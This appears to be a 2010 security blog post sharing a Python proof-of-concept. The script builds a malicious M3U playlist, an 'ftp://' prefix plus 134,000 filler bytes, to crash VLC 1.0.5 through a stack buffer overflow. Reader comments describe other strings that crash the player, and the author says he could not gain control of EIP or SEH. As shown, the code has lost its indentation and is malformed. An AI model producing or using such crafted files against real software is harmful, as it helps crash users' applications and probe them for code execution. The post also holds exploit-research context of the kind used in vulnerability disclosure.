Tuesday, August 10, 2010

VLC 1.0.5 M3U File Processing Stack Buffer Overflow

print "VLC 1.0.5 M3U File Processing Stack Buffer Overflow"

handler = "ftp://"
buff = "D" * 134000

mal_buff = handler + buff

try:
vlcm3u = open ("vlcm3u_mem_corru.m3u","w")
vlcm3u.write(mal_buff) vlcm3u.close()
print "\nMalicious M3U File Created . . . !!"
print "[+] Coded by Praveen Darshanam"
except:
print "\nUnable to Create File\n"

5 comments:

  1. Hey there,

    If you do this instead of the long string:
    handler = "ftp://google.com/"

    You still get null for msvcrt.strstr, same exception, and VLC crashes. Do you have more debugging notes?

    Regards.

    ReplyDelete
  2. Correction:

    This crashes the app:
    handler = "ftp://google.com"

    This doesnt:
    handler = "ftp://google.com/"

    Thanks.

    ReplyDelete
  3. yeah...i tried wat u said...the reason to post PoC with huge buffer is to check whether there is a possibility of corrupting EIP or SEH....but couldn't correct them.

    anyways thanx for the comments!!

    ReplyDelete
  4. hey praveen! i wanted to email you to discuss about the recent intel/mcfee merger. can i get ur email? i'm on yahoo too. krish

    ReplyDelete
  5. what will i know abt the merger...to get the details u need to talk with higher management

    ReplyDelete